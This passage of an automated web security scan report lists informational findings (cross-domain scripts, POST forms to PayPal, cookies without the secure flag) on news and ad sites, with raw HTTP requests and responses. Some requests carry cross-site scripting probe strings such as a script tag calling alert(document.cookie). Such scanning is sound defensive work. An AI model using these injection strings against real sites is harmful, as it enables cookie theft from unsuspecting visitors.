document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1946456325/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1946456325?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1946456325/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1946456325?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1946456325/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1946456325?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1946456325?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*100
...[SNIP]...

14.3. http://c.brightcove.com/services/viewer/federated_f9 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://c.brightcove.com
Path:	/services/viewer/federated_f9

Request 1

GET /services/viewer/federated_f9?&width=370&height=300&flashID=myExperience766783859001&bgcolor=%23FFFFFF&wmode=transparent&isVid=true&dynamicStreaming=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&%40videoPlayer=766783859001&autoStart= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=766783859001&rand=408
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Mon, 17 Jan 2011 15:41:31 EST
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us1.24.04.08.2011-01-14072625/BrightcoveBootloader.swf?purl=http%3A%2F%2Fwww.bostonherald.com%2Fmediacenter%2Fvideo.php%3Fsrc%3Dhttp%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv%26program_id%3D4c6ebfbed6269%26media_id%3D2024%26title%3DSidewalk%2520snow%2520woes%26width%3D370%26height%3D300%26bc_id%3D766783859001%26rand%3D408&%40videoPlayer=766783859001&autoStart=&bgcolor=%23FFFFFF&dynamicStreaming=true&flashID=myExperience766783859001&height=300&isVid=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&width=370&wmode=transparent
Content-Length: 0
Date: Sat, 29 Jan 2011 01:57:35 GMT
Server:

Request 2

GET /services/viewer/federated_f9?&width=370&height=300&flashID=myExperience766783859001&bgcolor=%23FFFFFF&wmode=transparent&isVid=true&dynamicStreaming=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&%40videoPlayer=766783859001&autoStart= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Mon, 17 Jan 2011 20:41:31 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us1.24.04.08.2011-01-14072625/BrightcoveBootloader.swf?%40videoPlayer=766783859001&autoStart=&bgcolor=%23FFFFFF&dynamicStreaming=true&flashID=myExperience766783859001&height=300&isVid=true&playerID=657985641001&playerKey=AQ%252E%252E%2CAAAAE6Rs9lk%252E%2CSN2uQ1cpwui9Aq_exhx7aflP2FnHceiC&width=370&wmode=transparent
Content-Length: 0
Date: Sat, 29 Jan 2011 01:58:14 GMT
Server:

14.4. http://onset.freedom.com/fi/analytics/cms/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://onset.freedom.com
Path:	/fi/analytics/cms/

Request 1

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response 1

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:35 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:49:35 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28783

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
op42 + ':' + s.pageName;
s.prop44="17:45";
s.eVar6="";
s.hier1="entertainment|root";
s.hier2="events.cbs6albany.com|entertainment|events|events|root";
/** domain=events.cbs6albany.com **/

/** referer=http://events.cbs6albany.com/?376e5%22%3e%3cscript%3ealert(1)%3c/script%3ea7771aeaee3=1 **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)
//if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+ '-')

Request 2

GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1
Host: onset.freedom.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response 2

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:50 GMT
Server: Apache
Cache-Control: max-age=7200, must-revalidate
Expires: Sat, 29 Jan 2011 03:49:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 28696

var fiChildSAccount="fiwrgb";

var s_account="figlobal,"+fiChildSAccount;
/* SiteCatalyst code version: H.9.
Copyright 1997-2007 Omniture, Inc. More info available at
http://www.omniture.com */
/*****
...[SNIP]...
op42 + ':' + s.pageName;
s.prop44="17:45";
s.eVar6="";
s.hier1="entertainment|root";
s.hier2="events.cbs6albany.com|entertainment|events|events|root";
/** domain=events.cbs6albany.com **/

/** referer= **/
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)
//if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+ '-')

14.5. http://twitter.com/malsup previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup

Request 1

Response 1

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:25:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224705-54401-50174
ETag: "369af92da7b575f3f9e1aeeb54e34e15"-gzip
Last-Modified: Fri, 28 Jan 2011 14:25:05 GMT
X-Runtime: 0.02191
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWNmZTFjMzZiNzFlNTc4YTNkZGVkNDQyNDg2ZTI1MTk2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8VoDzS0B--198beeb5bf2769390b9c3a6499e9bffa3abf42f0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 49593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">

<script type="text/javascript">
//<![CDATA[
(function(g){var a=location.href.split("#!")[1];if(a){window.location.hash = "";g.location.pathname = g.HBR = a.replace(/^([^/])/,"/$1");}})(window);
//]]>
</script>
<script type="text/javascript" charset="utf-8">
if (!twttr) {
var twttr = {}
}

// Benchmarking load time.
// twttr.timeTillReadyUnique = '1296182070-32644-55879';
// twttr.timeTillReadyStart = new Date().getTime();
</script>

<script type="text/javascript">
//<![CDATA[
var page={};var onCondition=function(D,C,A,B){D=D;A=A?Math.min(A,5):5;B=B||100;if(D()){C()}else{if(A>1){setTimeout(function(){onCondition(D,C,A-1,B)},B)}}};
//]]>
</script>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Mike Alsup (malsup) is on Twitter. Sign up for Twitter to follow Mike Alsup (malsup) and get their latest updates" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<m
...[SNIP]...

Request 2

GET /malsup HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1295994766153789

Response 2

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:25:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224733-2476-56454
ETag: "369af92da7b575f3f9e1aeeb54e34e15"-gzip
Last-Modified: Fri, 28 Jan 2011 14:25:33 GMT
X-Runtime: 0.01441
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWIwY2I0NTRjZDQ3ZjE0OGEzM2Y0M2Y1NGRmODliYjE0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIbcgDzS0B--2194c1bcafd7074cfe955b90c9396e96ed9331c5; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 49593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">

<script type="text/javascript">
//<![CDATA[
(function(g){var a=location.href.split("#!")[1];if(a){window.location.hash = "";g.location.pathname = g.HBR = a.replace(/^([^/])/,"/$1");}})(window);
//]]>
</script>
<script type="text/javascript" charset="utf-8">
if (!twttr) {
var twttr = {}
}

// Benchmarking load time.
// twttr.timeTillReadyUnique = '1296182070-32644-55879';
// twttr.timeTillReadyStart = new Date().getTime();
</script>

<script type="text/javascript">
//<![CDATA[
var page={};var onCondition=function(D,C,A,B){D=D;A=A?Math.min(A,5):5;B=B||100;if(D()){C()}else{if(A>1){setTimeout(function(){onCondition(D,C,A-1,B)},B)}}};
//]]>
</script>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Mike Alsup (malsup) is on Twitter. Sign up for Twitter to follow Mike Alsup (malsup) and get their latest updates" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<meta content="NOODP" name="robots" />
<meta content="n" name="session-logg
...[SNIP]...

14.6. http://www.screenthumbs.com/tools/js/linkthumbs.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.screenthumbs.com
Path:	/tools/js/linkthumbs.js

Request 1

GET /tools/js/linkthumbs.js?key=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

var linkthumbs_url = 'http://www.screenthumbs.com/thumb?direct=1&appkey=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome&format=0&width=200&height=150&url=';

var linkthumbs_clsNames = ['', 'type2'];
var linkthumbs_previewTypes = [0, 1];
var linkthumbs_delays = [0, 0];

var linkthumbs_iconWidth = 16;
var linkthumbs_iconHeight = 16;
var linkthumbs_iconURL = 'http://www.screenthumbs.com/tools/images/icon4.png';

var linkthumbs_mouseX = 0, linkthumbs_mouseY = 0;
var linkthumbs_currentThumbIndex = -1;
var linkthumbs_containerTimeout = -1;
var linkthumbs_dummyEnabled = false;
var linkthumbs_fadeTimeout = -1;
var linkthumbs_showThumbTimeout = -1;
var linkthumbs_currentOpacity = 0;
var linkthumbs_opacityStep = 15;

var linkthumbs_thumb = null;
var linkthumbs_container = null;
var linkthumbs_dummyThumb = null;

var linkthumbs_iconTimeouts = new Array();
var linkthumbs_thumbs = new Array();
var linkthumbs_icons = Array();

var linkthumbs_dummyThumbURL = '';
var linkthumbs_ie = false;

function linkthumbs_detectIE()
{
if(navigator && navigator.userAgent)
{
var userAgent = navigator.userAgent.toLowerCase();

if(userAgent.indexOf('msie') >= 0)
{
linkthumbs_ie = true;
linkthumbs_opacityStep = 0;
}
}
}

function linkthumbs_setOpacity(element, opacity)
{
if(element)
{
element.style.filter = 'alpha(opacity=' + opacity + ')';
element.style.mozOpacity = opacity / 100;
element.style.opacity = opacity / 100;
}
}

function linkthumbs_changeOpacity()
{
linkthumbs_currentOpacity += linkthumbs_opacityStep;
var display = false;

if(linkthumbs_currentOpacity <= 0)
{
linkthumbs_currentOpacity = 0;
linkthumbs_container.style.display = 'none';
linkthumbs_container._isVisible = false;
window.clearInterval(linkthumbs_fadeTimeout);
linkthumbs_fadeTimeout
...[SNIP]...

Request 2

GET /tools/js/linkthumbs.js?key=7ec75bbfc472f7c3c3236cf5e4735bd1&profile=sthome HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

//Restricted Access

15. Cross-domain POST previous next
There are 20 instances of this issue:

/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

15.1. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

15.2. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.3. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
submit
display

Request

Response

15.4. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.5. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.6. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.7. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.8. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

15.9. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.10. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.11. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

15.12. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

15.13. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.14. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.15. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.16. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

15.17. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.18. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

15.19. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

15.20. http://www.bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

16. SSL cookie without secure flag set previous next
There are 3 instances of this issue:

/hc/5296924/
/hc/5296924/
/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

16.1. https://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net
HumanClickKEY=1417917221691646769; path=/hc/5296924
HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?cmd=file&file=visitorWantsToChat&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
